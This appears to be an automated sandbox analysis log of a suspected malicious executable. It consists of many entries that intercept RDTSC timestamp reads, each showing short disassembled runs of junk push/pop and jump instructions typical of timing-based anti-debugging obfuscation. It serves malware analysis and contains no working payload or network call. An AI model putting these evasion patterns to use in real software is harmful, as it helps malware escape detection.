Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD71C6 second address: BD71CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4627E second address: C46286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46286 second address: C4628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4628C second address: C4629D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F9278BE2826h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4629D second address: C462A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F927881D806h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C462A7 second address: C462B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C467DC second address: C467E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C467E3 second address: C467EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C467EB second address: C46802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F927881D80Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46C94 second address: C46C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46C98 second address: C46CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F927881D806h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F927881D80Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46CB5 second address: C46CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46CBB second address: C46D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F927881D814h 0x0000000f jmp 00007F927881D80Dh 0x00000014 jmp 00007F927881D810h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F927881D80Eh 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47018 second address: C4702C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2830h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4702C second address: C47036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47036 second address: C4703A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4703A second address: C4703E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47177 second address: C4717B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4717B second address: C47186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47186 second address: C47198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9278BE2826h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47479 second address: C4747D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BB7F second address: C4BB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BCF4 second address: C4BCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BCFA second address: C4BCFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BCFE second address: C4BD07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BE83 second address: C4BE9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2835h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C018 second address: C4C027 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C027 second address: C4C04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9278BE2826h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e js 00007F9278BE2826h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jng 00007F9278BE2826h 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C04A second address: C4C04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C04F second address: C4C054 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C5EB second address: C4C5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C5EF second address: C4C5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C5F3 second address: C4C5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C5F9 second address: C4C62E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9278BE2834h 0x00000008 jmp 00007F9278BE282Dh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push esi 0x00000014 jng 00007F9278BE2826h 0x0000001a pop esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C976 second address: C4C980 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F927881D812h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4C980 second address: C4C986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC42F second address: BFC43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F927881D806h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC43A second address: BFC43F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD39C5 second address: BD39C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD39C9 second address: BD39E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9278BE282Fh 0x0000000c jnl 00007F9278BE2826h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD39E8 second address: BD3A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F927881D813h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3A00 second address: BD3A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3A0C second address: BD3A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4B711 second address: C4B715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4B715 second address: C4B71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C518C6 second address: C518D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51A28 second address: C51A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51A2E second address: C51A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9278BE2826h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F9278BE2826h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51A43 second address: C51A49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51E57 second address: C51E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51E5B second address: C51E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F927881D812h 0x0000000c jp 00007F927881D806h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C522A0 second address: C522A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C52694 second address: C526AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F927881D806h 0x0000000a jmp 00007F927881D811h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C526AF second address: C526C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F9278BE2826h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C526C3 second address: C526C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56EE0 second address: C56EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F9278BE2826h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55D1A second address: C55D1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55D1F second address: C55D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55D25 second address: C55D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12C95 second address: C12C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12C9B second address: C12CBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push ecx 0x0000000a xor dl, FFFFFF9Dh 0x0000000d pop edi 0x0000000e lea eax, dword ptr [ebp+124779DEh] 0x00000014 mov cl, bl 0x00000016 nop 0x00000017 jns 00007F927881D814h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12CBB second address: C12CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12DDF second address: C12DE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C132CA second address: C132EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2836h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13469 second address: C1346E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1362B second address: C1363F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2830h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1363F second address: C13644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E7A second address: C13E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E80 second address: C13E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55FFD second address: C56001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13CCE second address: C13CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56136 second address: C56145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F9278BE2826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56145 second address: C56149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56298 second address: C562B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2836h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5640A second address: C56410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56410 second address: C56414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56414 second address: C5641A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6202A second address: C62034 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9278BE2826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C62034 second address: C62041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C61BD8 second address: C61BDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C61BDF second address: C61BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F927881D806h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C648FB second address: C6490A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6490A second address: C64938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D819h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64AA9 second address: C64AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64AAF second address: C64AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64AB3 second address: C64AC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jnc 00007F9278BE2826h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64AC9 second address: C64ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68F31 second address: C68F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68F37 second address: C68F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F927881D806h 0x0000000d jmp 00007F927881D80Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68F53 second address: C68F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69099 second address: C690CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F927881D819h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F927881D80Ch 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6951F second address: C69525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C696BB second address: C696BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C696BF second address: C696C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69806 second address: C6980C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6980C second address: C6981A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6981A second address: C69820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69820 second address: C69825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69825 second address: C6982C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6982C second address: C69832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69832 second address: C6985F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F927881D806h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007F927881D814h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop esi 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B310 second address: C6B333 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9278BE2839h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B333 second address: C6B339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D7C0 second address: C6D7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F9278BE2826h 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FE92 second address: C6FEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jns 00007F927881D80Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FEA5 second address: C6FEBB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F9278BE2831h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
